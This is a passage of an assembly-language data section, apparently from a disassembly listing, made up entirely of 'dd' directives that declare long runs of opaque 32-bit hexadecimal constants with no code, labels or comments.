		dd 0E724D1DDh, 97FED02Bh, 572A0664h, 0F3FD1E2Ch, 0A03878A8h
		dd 0B8834B5Fh, 177D3DCAh, 0DAF81835h, 0BAE64C9h, 0DEC5B542h
		dd 7832AC40h, 1027E9E8h, 20942BABh, 82100C03h, 41712C1Fh
		dd 3FAFBDA8h, 550A51FAh, 230F8F80h, 592B26CFh, 5510900h
		dd 3B213903h, 4BEBDC74h, 0B349F8CAh, 79210422h,	0DD254002h
		dd 5052AC7Ch, 8EF9A189h, 21484C2Eh, 0F828E045h,	21A59345h
		dd 9F08BC5Dh, 812C6B00h, 141B4490h, 0B1304112h,	0E09866Eh
		dd 6CABD2Dh, 3B63B822h,	631DD1C6h, 228DC853h, 0CA6DDED6h
		dd 0EFB72872h, 7484E194h, 1DC10609h, 0D19D1ADFh, 0EE7EFA6Ch
		dd 8931B56Bh, 0C01F06A4h, 0A5E6C51Fh, 0EF033DF8h, 4F024176h
		dd 9DD3064Eh, 38CB9D63h, 89CA6297h, 0CA4E5950h,	0BE559025h
		dd 7A62813h, 0DD17DA42h, 0DD3D57DBh, 240062A0h,	3505FEA0h
		dd 0AC9574EFh, 8AB0E18Bh, 0D7957AEBh, 0FB2F910Fh, 7C268A40h
		dd 47F9C43h, 59C03351h,	27CAFAB2h, 26BE5654h, 0D7460890h
		dd 77343037h, 0B2727B01h, 0D973DC74h, 5F6150F5h, 0AAA9F532h
		dd 450A4480h, 0E221D097h, 892427CCh, 0FEF08A04h, 0E33B0BECh
		dd 3EE59503h, 9138FC03h, 208194A6h, 214B0AD1h, 73F8FDC6h
		dd 0C494FD80h, 0AF9CE250h, 8AE0C14Dh, 0C1680745h, 694B289Ch
		dd 383D0BAFh, 46044171h, 5D1A301h, 4B0A4F5Ch, 970DD53Dh
		dd 2A86CAAAh, 0FF2F280Bh, 66A21905h, 0A2AFD95Dh, 900C1188h
		dd 0FB43141Fh, 0F50FFD21h, 6985F887h, 0BB2F20Fh, 73A326BEh
		dd 0FE3AFF32h, 453749C8h, 308AF97Ah, 6A174EFEh,	0E32B1D0Ah
		dd 98CA4494h, 0CDC4689Fh, 96701F87h, 1B54F4E2h,	2B2C357Dh
		dd 0D04D0AB3h, 0E6F5069Ch, 0AA0AA500h, 56102C1Fh, 974B049Ah
		dd 945030C9h, 0C3F089D2h, 0F46B2084h, 201DBD47h, 3D94973Bh
		dd 0D83EEE4Eh, 0D82D123Dh, 544A369Bh, 63D05DF0h, 0D3EEC0C0h
		dd 5B2D4FB7h, 47017C17h, 55C402C3h, 0E0392245h,	0D59A2596h
		dd 7304DAE0h, 0FA912782h, 2C53483Ch, 61784ABh, 4B2332Ah
		dd 0D91AF32h, 79FAC0E7h, 5F1BAB91h, 0DCE9465h, 0D0312EC3h
		dd 0EBEB205Eh, 751E9425h, 6196B0C0h, 34D39C22h,	0A4FC5F29h
		dd 80063BCBh, 0E09CB949h, 34B74800h, 737044FFh,	8113ECBFh
		dd 6009CDA4h, 0C8B13494h, 0EC23B22Dh, 83CD38F1h, 0D87D06C2h
		dd 0E679ADA1h, 698C7ECh, 82EFBB2Fh, 0D9309EF2h,	0C2ED4119h
		dd 61903C18h, 0BC9D5F7Eh, 0C9BBFC3Ah, 8B52FB2h,	96B9D750h
		dd 6E6229Ah, 97F0E35Ah,	0E392532Eh, 6152B812h, 6753FA22h
		dd 3E44F617h, 9148A206h, 92447BC0h, 0D8498012h,	14DF83A5h
		dd 0B285AB03h, 0EBC7C168h, 0FE152E14h, 5D6523E5h, 0EB0B17F6h
		dd 0A420271Ah, 0A2FC5263h, 75F893DDh, 0F2061B78h, 2023813Fh
		dd 76959FA5h, 6A5D324Ah, 1590112Ah, 25B98D6Ah, 281821E1h
		dd 46EE011Bh, 4AEFDB80h, 0A02D960Eh, 68C0E37Ch,	4F341DCCh
		dd 1C71B975h, 0FE697770h, 0DA10F855h, 0A383B714h, 57F64149h
		dd 98876108h, 0D25F8709h, 0ACF4546Ch, 32385FCh,	0AAA80416h
		dd 0FDBF924Bh, 0FA5AC717h, 168D9135h, 0D230BC6Eh, 0D4422F15h
		dd 0EC50B9A9h, 66AD0977h, 0EE55948Fh, 2561927Ah, 47776A9Bh
		dd 50FFB20h, 0B40F20B1h, 87C165DCh, 0C9985724h,	0C55B1431h
		dd 11F8F5CFh, 0E00E80A0h, 0F83E0B2Eh, 25EA15EFh, 4DF8DC4Ah
		dd 0F6E11CC8h, 0BED04A45h, 0B20EC82Eh, 0FA0C31A9h, 941B87C3h
		dd 0C5F53A07h, 873946D2h, 0ED859F56h, 7468833Ah, 0B573291Fh
		dd 0A72F18BAh, 0EAC84344h, 0A739A1CCh, 0CE76472Ah, 0B86624BCh
		dd 52072D7Dh, 0F2EE0F82h, 0BC00DA9Dh, 3B1C5EE3h, 6C7D24E1h
		dd 0AAE9080h, 1610350Eh, 6E15454Fh, 3F8CA57Eh, 0FB07D6AFh
		dd 8202A0F4h, 4EEEFB82h, 232ABA68h, 0E55D3FA0h,	2BE529Dh
		dd 48619D6Bh, 5FC1C2A1h, 8C2C7024h, 18A1E17Fh, 808B2EE0h
		dd 8035B386h, 0FE67CF67h, 0EC92D181h, 861C7D7Bh, 3076D7C9h
		dd 2019BF57h, 3A8849CCh, 0DF6941FEh, 0D3BE4E07h, 0C828A77h
		dd 0ABB07895h, 0A0B8467h
		dd 13C751C0h, 0C18925D6h, 0BD3DA316h, 68216FAEh, 29D3C802h
		dd 2984E051h, 4F72DC8Ah, 1512449Fh, 0C6A268A6h,	48F45D3Dh
		dd 8A619824h, 0D3DCF71Eh, 1D2C9121h, 0FBB19224h, 0C2DD525Fh
		dd 24748527h, 206E3ACEh, 6981571h, 0AC4D5AA2h, 0B170B523h
		dd 8AAB18EAh, 0E5D5A85Ch, 0DDC0C204h, 0C2C54859h, 6AEAE7h
		dd 5DFCD6Bh, 8A12A3CDh,	712068BCh, 10BA8EA1h, 3489BBC2h
		dd 10D84B9Dh, 205121D9h, 70714CF9h, 72DF0FCAh, 0C5D37F97h
		dd 0D18924F5h, 615B5E80h, 19017AFAh, 0FAAF0730h, 3FBD7175h
		dd 45C8BC89h, 799D1047h, 7316619h, 88C2FC95h, 74ACDFBCh
		dd 0E87CF44Bh, 0E82633C9h, 4E4151D5h, 0F335ACE3h, 5AA08EAEh
		dd 96F675F5h, 0BBB58AABh, 0C7047672h, 0BB6320AAh, 412AF4C3h
		dd 318DCB6h, 0F3D2BEBAh, 68FE98B2h, 501A552Ah, 0CEF84BEDh
		dd 7BAA85Dh, 0D55A6163h, 7EF352AAh, 0F2EE82E8h,	0C782EA3Bh
		dd 0B388C189h, 79FF40FEh, 6CC4F5D7h, 40B81377h,	8F05C4C7h
		dd 0AD01BC7Fh, 794E943Ah, 0A0F5D595h, 5CDE184h,	0FC8B312Ch
		dd 0D805717Ah, 273453CFh, 58724C26h, 89D55845h,	78080EFCh
		dd 212A619Ch, 80B1735Dh, 0C4D5EE77h, 4F904C4h, 2013B40Ch
		dd 66944342h, 0D18146F6h, 3CFF370Ch, 0D0AC37D7h, 0A76AC1DDh
		dd 70CC843Eh, 22A86243h, 2D13797Ch, 76DFCA26h, 29A007C7h
		dd 3D4596B5h, 5178E106h, 0D5FC2D88h, 1749C276h,	0C8459DA2h
		dd 80FD92BFh, 2F32D753h, 79F1C80Eh, 71A81093h, 7D802982h
		dd 56705FF7h, 0EE9C21B4h, 7817B13Fh, 0E1956D4Bh, 9D380A83h
		dd 19FA25CFh, 4A42A78Ch, 28A90BF4h, 0FC051A85h,	86BE910Fh
		dd 0A8D4A32h, 0CAE59C64h, 0D5C94108h, 19A8D3F2h, 5D152657h
		dd 3013F8CFh, 823BFCFDh, 0D5D804Ch, 0B1E6F6E1h,	12E86D19h
		dd 573CC59Bh, 923EFA62h, 0E0FEEC1Ah, 0AA8FF02Ah, 229F41DFh
		dd 0C3528B66h, 0A0EAD5D0h, 68F83421h, 59E85A05h, 8EE55ED9h
		dd 8DB9522Bh, 854340CCh, 0BB815686h, 4E0D6FCDh,	0B40CF0DDh
		dd 0B4550311h, 3BA71941h, 13C81DEBh, 0C903441Bh, 0AD11150h
		dd 82B11A20h, 2C1D16CAh, 0CD174A60h, 0C59EB946h, 0C336563Ah
		dd 92A95717h, 0B5CCAC61h, 0F0C7E223h, 774B3995h, 3584342Bh
		dd 2D07F559h, 1FC23BF3h, 58A19C46h, 28BB2A06h, 537D61DCh
		dd 0A084F279h, 6E1CB08Fh, 0D3D5F4AFh, 7F738B26h, 0E7D1EE82h
		dd 334A50Fh, 8E0F7532h,	8D82233Fh, 59E09E05h, 0E2DF43D7h
		dd 83BF9B2Ch, 252C950Ah, 0FFD536BBh, 20B97F40h,	0FB1F7AB3h
		dd 9AFC48D1h, 5FBF5222h, 0E8BC0065h, 9512081Ah,	34B8F7Ch
		dd 29985A1Bh, 0C1754EEEh, 0DABFB9ECh, 3B54066Eh, 75967D9Ch
		dd 0E2B40ABBh, 0C782FFFAh, 0D3B7A471h, 0FC568472h, 0C5E1AE44h
		dd 8E2ED83Fh, 9D59551Ah, 0E7668C18h, 0F1F4B801h, 698E6B0Ah
		dd 291BE320h, 0B34E857Fh, 0BE35ABFAh, 3E263D8h,	62EBD21Dh
		dd 73E48124h, 449CF960h, 7C623793h, 0C5022025h,	2859D1Fh
		dd 2681A156h, 995CF4ABh, 0AAADBE8h, 0DC34F81Ah,	5291B9DEh
		dd 55551F73h, 241383A5h, 0FAF1D9DCh, 0F8A62110h, 0E954CABh
		dd 0C5808EBBh, 4F93C028h, 39C38BEEh, 277C8149h,	0CF0CF5D6h
		dd 9155F4h, 68CADD70h, 0B8283C44h, 0E5F91F84h, 161F872Fh
		dd 0B7D0AA0h, 0C0D84FD8h, 0BBE98790h, 39DC71E4h, 17913032h
		dd 0A51B8FBEh, 55555A02h, 0D95D7565h, 85E75542h, 0ABB58751h
		dd 0D6ABDCE1h, 0CA1BB5F2h, 80B4EE08h, 2F8FCCDFh, 0A8FBEF8Eh
		dd 0E210AD02h, 9379CB36h, 0F1DF1245h, 7D51D5A2h, 757DC1C4h
		dd 0CD402D2Ah, 43B9FD3Bh, 0B974DD86h, 7865C834h, 7E8686E1h
		dd 11BE613Fh, 59FF8ED0h, 962BBB05h, 0F01CA85h, 235F2665h
		dd 0A5108651h, 808605FDh, 12AC08A0h, 37F41405h,	0A0247812h
		dd 91C69981h, 2D3E0E42h, 1549FA9Eh, 3B0FB85Eh, 0DFC39977h
		dd 1F2F0440h, 8061335h,	0ABBDBF58h, 0BE531ABCh,	0B07C4E2Eh
		dd 5F4F1082h, 44200CE1h, 0D140C6BCh, 64106BB1h,	66E98A4Fh
		dd 21015C9Ch, 89121531h, 0C3EBE871h, 0DD69241Ch, 600F8C42h
		dd 788E48Ch, 8B125A16h,	6D55D5AEh, 7FC502B0h, 10AB0271h
		dd 5BD18AE9h, 735D38BBh, 0D86C20B5h, 0F8B465C1h, 73481572h
		dd 0CD2A779Fh, 0C52877D8h, 9E340AAFh, 0A0211CD5h, 6549144Ah
		dd 865329C3h, 2983753Dh, 823CC5DCh, 6892989h, 0DC573E3Ch
		dd 9575EC5Dh, 975F700Eh, 0AD1D095Fh, 0E293A150h, 42305F6Bh
		dd 74A08DA8h, 0DB5313A1h, 9F48BAF9h, 0AC22957Dh, 0C5DA60Ch
		dd 7DBEA352h, 0BBA92E3Dh, 0D02917Dh, 0B41E2FDAh, 0E4BF6B70h
		dd 4751105Bh, 0E014CD68h, 6300103h, 2FE9F19Ah, 0F30414EDh
		dd 27B43480h, 0FC14002h, 1851DA7Dh, 6EBA748Ch, 3D0605A5h
		dd 0B27B4D58h, 0C22408Bh, 0AFD07923h, 82816E11h, 4378C03Bh
		dd 6950B1A8h, 0A795CAE2h, 0DFE45AFh, 792348Ch, 7EFA0980h
		dd 0D703F068h, 0A626E67Bh, 636EC580h, 0A777EBE4h, 0D0C158D9h
		dd 0EBF458A5h, 0DE09AFF1h, 586F14DDh, 2F27C7Dh,	2BC814E3h
		dd 0CC39F08h, 42362D31h, 0BBC68EABh, 12230EF2h,	181E6457h
		dd 5661688h, 1031D4C2h,	4DEB50D4h, 0BAAAB5E2h, 622E51A8h
		dd 2C47DD17h, 0B8B4FBB2h, 57D0F73Eh, 7AF23E14h,	8ADD50F2h
		dd 0ED33CAE1h, 2BE89908h, 55E46028h, 0C0847981h, 0D7176E3Dh
		dd 62E922B2h, 0FE54699h, 3E04114Ch, 484265B6h, 0AEB11214h
		dd 8E111224h, 0FB77084h, 31382F11h, 2CC77444h, 1A10857Dh
		dd 0CB2ADFA0h, 52A58284h, 1A45AB49h, 0C7147FABh, 6FAB8BA0h
		dd 67CDDBA3h, 5E5C674Ah, 4B3FA72Ch, 0DC6A5474h,	2714D1AEh
		dd 4F119846h, 131D5557h, 7547B99Ah, 0BB91DE91h,	0E3287480h
		dd 0C6F7E903h, 0EE384C97h, 8D4A2A2Bh, 0D03E0526h, 5FE94321h
		dd 0E1A25135h, 0ECA67C7Fh, 749314DEh, 89148339h, 0D532F576h
		dd 0D7A08B2Fh, 62C5567h, 30BD68E0h, 0C209CA46h,	8247BC6Dh
		dd 0A0CB7E99h, 6355E148h, 364EADDh, 0B4018D18h,	0C5BC1AA0h
		dd 0EDD70303h, 154BEEBEh, 0C0BAE5Ah, 0D65C7858h, 24DFFF73h
		dd 0A4E4960h, 0CD8D76D0h, 8A04E0F7h, 94827AB7h,	0CBBA05D1h
		dd 0A2F76E35h, 1480C658h, 40266511h, 0DBB2E6E8h, 0E2BA8AAh
		dd 0CA1DCCCEh, 0AEACAA7Eh, 0CB478164h, 0B5BBECD2h, 6F97C143h
		dd 4AEF2BBFh, 39845594h, 46BB9041h, 618D55D4h, 0A8258EF1h
		dd 3FB62FC4h, 64A36ACCh, 7DD281D8h, 3AC60188h, 118CC918h
		dd 0CBE2374h, 406DEC31h, 0FF110E34h, 0F88F01C9h, 0F80C6E02h
		dd 32310063h, 8A24700h,	6B965301h, 0A681A295h, 906BFBCh
		dd 4ECC1CEBh, 8433966Fh, 0D10AF148h, 0A749CEDh,	451E0F4h
		dd 0DF923DCh, 29E8A76Ch, 52BD6FD5h, 73298028h, 68651077h
		dd 0BBB6A774h, 9505CE30h, 0BF50281Dh, 21177900h, 0AA2C0AD2h
		dd 815AF2ABh, 5DDA14CEh, 15B58D59h, 0C7F9B13Bh,	68C67FBEh
		dd 8072AA7Dh, 0AD335813h, 5D3D2045h, 0F5EB7E2h,	2C05D615h
		dd 268E9D41h, 7EA50EE6h, 596DD713h, 20DDABC3h, 1330CEEAh
		dd 9E5A4F74h, 0BF2D33E5h, 7F18583h, 21C99E4Fh, 6BAC50A7h
		dd 0CAE09074h, 0FEEF9157h, 8518BC79h, 0E02FAE91h, 0FF28A15Eh
		dd 0B280F56Ch, 595C8A83h, 0C8252605h, 37DD555Eh, 945D8BECh
		dd 436E277Bh, 25619B2Ah, 715150FCh, 253DCAD2h, 34858401h
		dd 0F76C2050h, 1D09D619h, 36EC3477h, 7882E027h,	9313B245h
		dd 0FC7F636Eh, 7D1B21D1h, 0F5795B54h, 0C615CA0Bh, 0D52CFFBBh
		dd 954E1F91h, 3DE1DBE4h
		dd 0A231ACC2h, 171E494Fh, 0A5AE8974h, 4FAAFE45h, 45DDCF55h
		dd 24510CB2h, 0DDC2DB88h, 8FDD6D20h, 6FDA3184h,	0D332290Ch
		dd 316DA648h, 0FCA990D6h, 0F8A45655h, 85C1C297h, 0B7F5121Fh
		dd 0F1E10C92h, 5E727CC1h, 3175157Fh, 0E35D7256h, 93C79C31h
		dd 2A132C2Ch, 346FAA82h, 45BD4C92h, 2BC95419h, 291C7396h
		dd 80D64B1Ch, 83C16E85h, 2B0E1FF6h, 5F31601h, 959F7014h
		dd 5A1CF670h, 0B27D6FBh, 7FF19C46h, 5627DB91h, 5147171Eh
		dd 0FCBA12C4h, 4A11A145h, 851C4157h, 0A50AD5AAh, 0AAC9C5F5h
		dd 0AB2EE444h, 2EFB3914h, 72B0B874h, 48BA09B7h,	5D66B32Dh
		dd 0E3647CAh, 0A83496A8h, 0CE298D08h, 0DE7E5B35h, 961ADB54h
		dd 63C64F59h, 263E747Ah, 0E8BA99C8h, 2FFFA0BAh,	0BB2A9182h
		dd 9777318Eh, 8D7DCA8Ch, 0F0AEB6h, 0ADEB7676h, 7D859C0Eh
		dd 0FB2B2865h, 58D552CFh, 7B23377Fh, 0EAF32ACBh, 0D940CC42h
		dd 48F62CE3h, 52CA061Ch, 0DADE357Ah, 50A23235h,	0A9372128h
		dd 0BAAD83BEh, 7D9859CEh, 0D65DB8Bh, 117519F4h,	1E6B66EDh
		dd 0D3F071FDh, 0A32AB008h, 4E603BC6h, 585EAC55h, 248CF749h
		dd 8D152B77h, 4ACF5824h, 0B5592BBFh, 0EC58EB5Dh, 8B5DFD41h
		dd 45837A29h, 17DF5CFFh, 0A685C861h, 0FD44BFF1h, 1D23ECE9h
		dd 92E2C2ACh, 3F8F5D6Ah, 0B068DEF7h, 0EA650F93h, 0CA3AB9D6h
		dd 7FA1E6F7h, 0D785B681h, 0A88A3670h, 0A9123E20h, 0D80640CAh
		dd 61027D15h, 0C6D6C05Eh, 681D492Ah, 887D3E1Fh,	0E38500CCh
		dd 1168716Bh, 0A53B20B5h, 0A168279Bh, 0F9C5D681h, 1D1248DAh
		dd 5F2C0B47h, 4E58E5A7h, 2BFF7B06h, 2870FC04h, 6C256A85h
		dd 0A99149EBh, 52515AAEh, 0F1BC3CE1h, 0CBE40051h, 0C85C5723h
		dd 60DF1277h, 4E6757E1h, 72E0B9E5h, 0F16ECDACh,	80F24839h
		dd 4D46DCF3h, 1DD252E4h, 0F34218CEh, 922024E7h,	4708D181h
		dd 18DB9050h, 0A2A98144h, 51A0C818h, 9E528844h,	74C4E340h
		dd 2A31E544h, 0E559B5BBh, 743DF2C9h, 1DF0510Ch,	930EE24Ah
		dd 0CDCF61Ah, 0B42CF378h, 0AA563CD9h, 55706A98h, 74DC2B79h
		dd 2D143D19h, 59CC6518h, 85D9279Dh, 672D830h, 7EC7FD61h
		dd 0E8EAEB5Ch, 4A6423F7h, 82A1C891h, 552A0D64h,	70BA4E70h
		dd 0D83EBA40h, 498BC368h, 0CA8D1C41h, 0CD8FC6ACh, 0BF803E28h
		dd 0E3805F4Bh, 0D20529D4h, 9B45E531h, 0F018AA39h, 5451C4h
		dd 4CB33A95h, 40D32B44h, 4C02DE94h, 1DEA1101h, 2B1C82CAh
		dd 0DBF5960h, 4F2AC7Bh,	0BE3F5D66h, 2C6F24EDh, 4B1DE8D8h
		dd 760ECB19h, 0B97727C2h, 0BF1310F3h, 0CC7ADED3h, 4EDB9839h
		dd 0DF1BBDBBh, 2E4018BFh, 8FB32C88h, 0A36245E1h, 5CA215E8h
		dd 6C2E9B48h, 0BD979DF2h, 0FEEC4412h, 557EE91Fh, 95E8840Ch
		dd 0D1A38BAAh, 0E1C3B931h, 42328EE3h, 2CF824Eh,	0E727FFDDh
		dd 97E74443h, 6182C0BEh, 754AAF7Bh, 25CBCA16h, 0E059EFD1h
		dd 0F6531431h, 0E842E967h, 6789167Bh, 0C39637C1h, 51430Bh
		dd 0E90A6C9Bh, 50DF49D2h, 0F5E75362h, 0D6898101h, 0BC0C835Ch
		dd 0FDA10792h, 0E02547DBh, 8AAEF82Ch, 0AA655FE3h, 0ACA88DA3h
		dd 5DB37293h, 0E4139ACAh, 490802E2h, 29568D3Ch,	7224AE43h
		dd 9223581Ch, 0DD137892h, 533462D7h, 779B8AB3h,	46B93170h
		dd 1FBDE678h, 1F93B80Ah, 0CC1A8CAh, 0E7353512h,	537357A4h
		dd 0F75133F1h, 0F42A574Eh, 0A08B0902h, 0DA29E2ACh, 8F2CBFDCh
		dd 6CC6EC8Fh, 1351FAD1h, 0D402D2E7h, 0BE6F630Bh, 0AD7CC18Dh
		dd 5C4694DDh, 0BA46920Ch, 0A93277D7h, 123FB03Fh, 0F5A7A3EDh
		dd 942B1091h, 902A7D3Bh, 4D27ED40h, 0B35DCBE6h,	0EF35F9F4h
		dd 5D2246Fh, 0F5D40A0Dh, 95042AD5h, 6A08AB6Bh, 107F3D7h
		dd 82BC79Bh, 0D9461347h, 97CA9561h, 6EF2BA54h, 72961264h
		dd 0C52EB3A9h, 5D451AACh, 0A508D27Ch, 45DC4F92h, 0C0AB5739h
		dd 472ABF1Bh, 631D378Bh, 0BD7108B3h, 141226EEh,	86C7F618h
		dd 795986Fh, 12BABFC6h,	6425FF18h, 543DAC83h, 2BA98FAAh
		dd 19DF40BCh, 0AE0EC22Bh, 1DFBFE87h, 953CEFCEh,	9EF89542h
		dd 0E1C11094h, 5620AAA8h, 0D84C6C7Dh, 0A1596716h, 0FBF53608h
		dd 5CADADB1h, 0F6884650h, 57C8241Bh, 0E8C3CF11h, 0ABE0B6ACh
		dd 0C9C15B86h, 17FF0260h, 9212A75h, 0C396BBB8h,	5B551556h
		dd 8944278Ah, 23A0FAF2h, 0FEEDDF6Eh, 42F3D861h,	0E0927414h
		dd 6E54D6ABh, 88452C7Ah, 2A6EA84Ah, 6115D76Bh, 0F45D9C28h
		dd 0EECD7DE4h, 12A1F24Ch, 92BCECD1h, 0F63E2AAAh, 0A559BFF2h
		dd 0AE0DFD32h, 0D610740Eh, 8A990B55h, 9CCB2EB3h, 612925F5h
		dd 16544571h, 87D45A69h, 462622B2h, 5EB8E068h, 0B8B47A13h
		dd 504AABCh, 9CD72B8Fh,	0E912E1FEh, 0B9246297h,	1180F4E0h
		dd 4EF95267h, 0B60FB4A0h, 8E45775Fh, 1A4192B9h,	0BEC0257Ch
		dd 1E0E018h, 0EC555739h, 562E0C20h, 1810E793h, 6FBCB3BEh
		dd 0D21168DFh, 24A1C2F2h, 920C8906h, 5E2E74Dh, 0D740FC34h
		dd 0EA9ECCC4h, 0A6B635AAh, 543FC492h, 4E2F4BCh,	5F9CE5C1h
		dd 0D3ACC055h, 0C231914Eh, 0FD43AF09h, 267D8E4Ah, 0DC90B578h
		dd 0A6F82AC7h, 0FE11C0DCh, 0EF6ADA24h, 9A833D22h, 0DF8B1778h
		dd 6C4754AAh, 5469E23Dh, 391438E4h, 0E5B4175Ch,	2FE20E4Ah
		dd 0BAA1122Bh, 99085047h, 0EB810CA3h, 61B443E9h, 93D48FE1h
		dd 0E6592828h, 10A9955Bh, 80291F15h, 529A03BFh,	4144E270h
		dd 0F642CA17h, 0E4376211h, 6049A22h, 554690ADh,	5D252705h
		dd 1C413C82h, 0BA9A2259h, 0FD3AF768h, 0ACC70498h, 23794F8Ch
		dd 0E17E2A2Ch, 0F67CE781h, 2842A2B5h, 0C99F5127h, 88B553A2h
		dd 0CD7C45D3h, 342371E0h, 6C17983Eh, 1C5DD71Ah,	296845F2h
		dd 95664740h, 30D42F06h, 84D664E5h, 8029134h, 3344C5D6h
		dd 1E6D1EB8h, 0AE9CE053h, 42AEC48Ah, 0E4FDD280h, 0C409A61Dh
		dd 9A8D643h, 60E8DD61h,	0B8FB63BAh, 9DC8842Ah, 54AD7C14h
		dd 7155A206h, 516F94AAh, 280F235Ah, 0B2A657E9h,	0EC1B3D8Bh
		dd 3B690704h, 35611402h, 0E2020E86h, 1681E1FFh,	0C1F1A0E8h
		dd 0E2D859B6h, 74EA230Bh, 4B11A3A9h, 0AA0A28A0h, 0DDF946Dh
		dd 0FB220BA8h, 0D3D1811Dh, 5DE760EFh, 282D64F0h, 4FC20DCBh
		dd 0E3C1B7F1h, 6309E9DDh, 4BFED416h, 4542A9F8h,	0BFCD14BBh
		dd 0A7543AAEh, 0A3393C06h, 43D7DD6Fh, 0BDEC3904h, 550A253Ch
		dd 49EC8A10h, 5F65BBCAh, 46B66B16h, 0E8DF70D9h,	1FAABEFDh
		dd 0B919DA46h, 149E15E2h, 0AB68471Dh, 2C971368h, 0A266A060h
		dd 8A7C3450h, 21932BA0h, 85741684h, 8D8D9311h, 1E96245Bh
		dd 7F8FB2F8h, 32F70CD3h, 2C21FF37h, 4C029609h, 4A9CFDEBh
		dd 8B04C942h, 2CBEFCCDh, 7F080F96h, 63F0ACE3h, 0C643ABFBh
		dd 1BBA87AFh, 939D9C8Ah, 55F12FC7h, 0ACE920FEh,	6E727F9Bh
		dd 739DD34Ah, 62408D56h, 4D4A17C3h, 11EBE717h, 0B1A3A24Dh
		dd 288B540Ah, 9CF20578h, 7229B976h, 0C7FB299Ch,	0AEC6DE89h
		dd 0E8C7D36Fh, 2241320h, 188E91C9h, 4D59411Ah, 981F4611h
		dd 5FD314A7h, 396FFFC1h, 0BCD4FC9Ah, 22C9AB3Ah,	5A885D2Dh
		dd 0DE523FA8h, 420CD4D4h, 8C22AE6Dh, 2B2E72E6h,	49C65D22h
		dd 0D6C7A54Dh, 53D7902Dh, 387096E2h, 0DC8A7550h, 0D236C6Bh
		dd 0E28E206Ch, 6A2A0D94h, 51E772DBh, 51E5A8B3h,	82506A61h
		dd 4588B468h, 39F5C6CDh, 4AD8396Dh, 0CF2936CCh,	648392C1h
		dd 0BDE96945h, 9D87AAAEh, 7D9E3FEDh, 248838EAh,	2F14C457h
		dd 1C4FCA7Ch, 0E194FDA1h
		dd 2FCA9F7Bh, 950C5530h, 7804B2BAh, 0E882FE91h,	3A3010C4h
		dd 60FA7451h, 14919936h, 9D2C40C1h, 274D3A50h, 89D34E98h
		dd 0E23313A3h, 2C84E9h,	75114F14h, 427528C2h, 0A09D822Ah
		dd 0AC27313Ah, 0AC09544Eh, 0EB425713h, 3AE0D644h, 4EBC75B1h
		dd 1A0D9D74h, 1FD275Fh,	308C6DB6h, 8473CBA5h, 14471798h
		dd 0E661188Eh, 239A3288h, 488E1CCEh, 41F00473h,	9FD66A11h
		dd 0A9989657h, 0AFEDDE9h, 0E7CA34EEh, 9664F4DCh, 96528BABh
		dd 0CD68F184h, 0FFBC9C9Dh, 0CBF14F7h, 310A1664h, 468805E4h
		dd 213C226Dh, 4C4F0245h, 1D4F8A21h, 55132308h, 15842388h
		dd 91A2C902h, 78BCD94Fh, 0DE404AE2h, 0B85DA354h, 0B174975Eh
		dd 88D527A8h, 0A9EBA13h, 0F0CFD0DDh, 0EC47DCEh,	0D1A7BB15h
		dd 0D7B1428Eh, 26DB5CB5h, 4104148Ch, 0F4B644C7h, 0B9AFAB2Fh
		dd 0E2A0002Ah, 0D7045248h, 61F50A7h, 493D8E14h,	0CBABAB82h
		dd 6127F17h, 0F86093FFh, 321AFC17h, 7EE706FEh, 3892342Eh
		dd 0FDAA74E0h, 84BD0558h, 62956AE1h, 6958CA57h,	430B71B8h
		dd 7CD7A814h, 0F20E4486h, 0A3360DCAh, 543CBAB8h, 8F1A7FA7h
		dd 38215B32h, 2FE8E534h, 0C9FF1D30h, 0B0FCABF0h, 0FC220703h
		dd 6D1A5428h, 0AE328142h, 5E9E3C97h, 0B070C1ECh, 0DA04EB8Eh
		dd 76587B83h, 0C87DCC3h, 0D550B0D2h, 20C74E22h,	0DB87C457h
		dd 268A2B0Ah, 8254BA40h, 0E64400EDh, 8861BD9Dh,	8959335Dh
		dd 0E0FF7B6Bh, 0BDC8EFB4h, 0F7FC704Ah, 0BB5BFE36h, 6728C29Fh
		dd 52EB9DFEh, 0F814B08Ch, 0A2A5734Dh, 0FF2E77C1h, 55433AA8h
		dd 33C4B4DCh, 9BA1FA06h, 4C810C1Dh, 143FFE4Ah, 101F83B2h
		dd 0E8BE944h, 4E6F885Eh, 5C2FFC82h, 1FB6A56Eh, 0C0425CFEh
		dd 0DD18A07Fh, 0C9159254h, 4BFA0A7Fh, 7324373Ch, 15379153h
		dd 0E0C9BF89h, 11982866h, 22A2E1C0h, 0A0ABA4EAh, 6C821940h
		dd 51229563h, 28031ECh,	42657E50h, 5FC98806h, 7147C1Fh
		dd 8A7FF74Ah, 6862C057h, 0C6D1D4B9h, 5D2C29F1h,	90C4BFEAh
		dd 1D4BA818h, 0A625061h, 7D36400Ch, 0C955751h, 0C150F04Ah
		dd 0DDAB5D68h, 0BF000BC7h, 927F3BDFh, 2EE819ACh, 42B74F56h
		dd 3FA7A081h, 438087FEh, 0E3AEA439h, 0BD04AAACh, 0DA0ED89h
		dd 1D4178F7h, 99959DD6h, 0F4D4D8FEh, 0F943AF78h, 29FDFC21h
		dd 0E10FF494h, 0C7BA31C7h, 0BC11CA77h, 5457DDE0h, 0E8257A57h
		dd 9294A68Dh, 0ECD24EF8h, 64297EBFh, 0DA3F4110h, 1C243879h
		dd 0DC0BB067h, 80D11141h, 4F2A091Ah, 4826FD31h,	0AC17F821h
		dd 0E6918EF8h, 84D4977Ah, 16C4C55Eh, 0D0960757h, 59C252D1h
		dd 0E2B12AE2h, 5AA8B35Bh, 6B97D14Ch, 0A0353EAAh, 7D9099F7h
		dd 4FCF657Ch, 6F24D5F3h, 21B4BCE6h, 0ABE806E9h,	89896F3Eh
		dd 9F55D7C0h, 0A6285A32h, 2621F46Bh, 0F713ACCEh, 5C65505Dh
		dd 7A17A140h, 0BD2222B2h, 32E5EC4Bh, 0CBD59E92h, 8BBEDCF5h
		dd 1DC6D465h, 0D8BA5FC3h, 15CF8093h, 59C9BC53h,	0DBBF8C4Dh
		dd 15161EEDh, 0FC2D0082h, 2CE9A26Fh, 556E47C0h,	0EC60D151h
		dd 66C0B32Bh, 0B5A55209h, 0B1FACE69h, 0C7045D88h, 5D660CF0h
		dd 15C0FCE1h, 4621F5F0h, 2C0C64BCh, 0EDC57016h,	8E433047h
		dd 0C524809h, 18B4D8Ah,	67D2A756h, 0AAF88C1Ah, 2231C2FDh
		dd 2C94DA24h, 193B768Fh, 0A12A81E2h, 81F6FCDCh,	0CD1EF734h
		dd 14E04D7Eh, 0F58D50D1h, 2A324A0Dh, 0F822F996h, 6DD2B6B4h
